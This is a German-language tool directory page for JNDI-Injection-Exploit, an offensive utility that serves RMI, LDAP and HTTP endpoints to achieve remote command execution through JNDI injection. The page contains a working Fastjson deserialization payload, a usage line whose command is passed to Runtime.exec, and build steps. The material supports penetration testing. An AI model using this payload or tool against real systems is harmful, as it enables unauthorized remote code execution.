Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
JNDI-Injection-Exploit — JNDI-Injection-Testwerkzeug (Ein Werkzeug, das JNDI-Links generiert und mehrere Server starten kann, um JNDI-Injection-Schwachstellen auszunutzen, wie Jackson, Fastjson, usw.) | Kitploit
Tools/GitHubGitHub/welk1n/jndi-injection-exploit
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-Exploitation
GitHubwelk1n/jndi-injection-exploit

JNDI-Injection-Exploit

JNDI-Injection-Testwerkzeug (Ein Werkzeug, das JNDI-Links generiert und mehrere Server starten kann, um JNDI-Injection-Schwachstellen auszunutzen, wie Jackson, Fastjson, usw.)

Repository anzeigen
2.8k730vor 6 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

JNDI-Injection-Exploit

Materials about JNDI Injection

Chinesisches Dokument

Verwandte Artikel

Beschreibung

JNDI-Injection-Exploit ist ein Werkzeug zum Generieren funktionsfähiger JNDI-Links und zur Bereitstellung von Hintergrunddiensten durch Starten von RMI-Server, LDAP-Server und HTTP-Server. RMI-Server und LDAP-Server basieren auf marshals und wurden weiter modifiziert, um eine Verbindung mit dem HTTP-Server herzustellen.

Mit diesem Tool können Sie JNDI-Links erhalten. Sie können diese Links in Ihren POC einfügen, um Schwachstellen zu testen.

Zum Beispiel ist dies ein Fastjson-Schwachstellen-POC:

root@kitploit:~
{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://127.0.0.1:1099/Object","autoCommit":true}

Wir können "rmi://127.0.0.1:1099/Object" durch den von JNDI-Injection-Exploit generierten Link ersetzen, um die Schwachstelle zu testen.

Haftungsausschluss

Alle Informationen und Codes werden ausschließlich zu Bildungszwecken und/oder zum Testen Ihrer eigenen Systeme auf diese Schwachstellen bereitgestellt.

Verwendung

Ausführen als:

root@kitploit:~
$ java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar [-C] [command] [-A] [address]

wo:

  • -C - Befehl, der in der entfernten Klassendatei ausgeführt wird.

    (optional, Standardbefehl ist "open /Applications/Calculator.app")

  • -A - die Adresse Ihres Servers, möglicherweise eine IP-Adresse oder eine Domain.

    (optional, Standardadresse ist die Adresse der ersten Netzwerkschnittstelle)

Punkte zur Beachtung:

  • Stellen Sie sicher, dass die Ports Ihres Servers (1099, 1389, 8180) verfügbar sind.

    oder Sie können den Standardport in der Klasse run.ServerStart in Zeile 26~28 ändern.

  • Ihr Befehl wird als Parameter an Runtime.getRuntime().exec() übergeben, daher müssen Sie sicherstellen, dass Ihr Befehl in der Methode exec() funktioniert.

    Befehle in bash wie "bash -c ...." müssen doppelte Anführungszeichen erhalten.

Beispiele

Lokale Demo:

  1. Starten Sie das Tool wie folgt:

    root@kitploit:~
    $ java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "open /Applications/Calculator.app" -A "127.0.0.1"
    

    Screenshot:

    image-20191018154346759

  2. Nehmen wir an, wir injizieren die in Schritt 1 generierten JNDI-Links wie rmi://ADDRESS/jfxllc in eine anfällige Anwendung, die durch JNDI-Injection angegriffen werden kann.

    In diesem Beispiel sieht es so aus:

    root@kitploit:~
    public static void main(String[] args) throws Exception{
        InitialContext ctx = new InitialContext();
        ctx.lookup("rmi://127.0.0.1/fgf4fp");
    }
    

    Dann wird beim Ausführen dieses Codes der Befehl ausgeführt und das Protokoll in der Shell ausgegeben:

    image-20191018154515787

Installation

Wir können eine der beiden Methoden auswählen, um das JAR zu erhalten.

  1. Laden Sie das neueste JAR von Realease herunter.

  2. Klonen Sie den Quellcode lokal und bauen Sie ihn (erfordert Java 1.8+ und Maven 3.x+).

    root@kitploit:~
    $ git clone https://github.com/welk1n/JNDI-Injection-Exploit.git
    
    root@kitploit:~
    $ cd JNDI-Injection-Exploit
    
    root@kitploit:~
    $ mvn clean package -DskipTests
    

To-Do

  • (Erledigt) Kombiniere dieses Projekt mit JNDI-Injection-Bypass, um funktionsfähige Links zu generieren, wenn trustURLCodebase in höheren JDK-Versionen standardmäßig false ist.
  • … ...
Tool herunterladen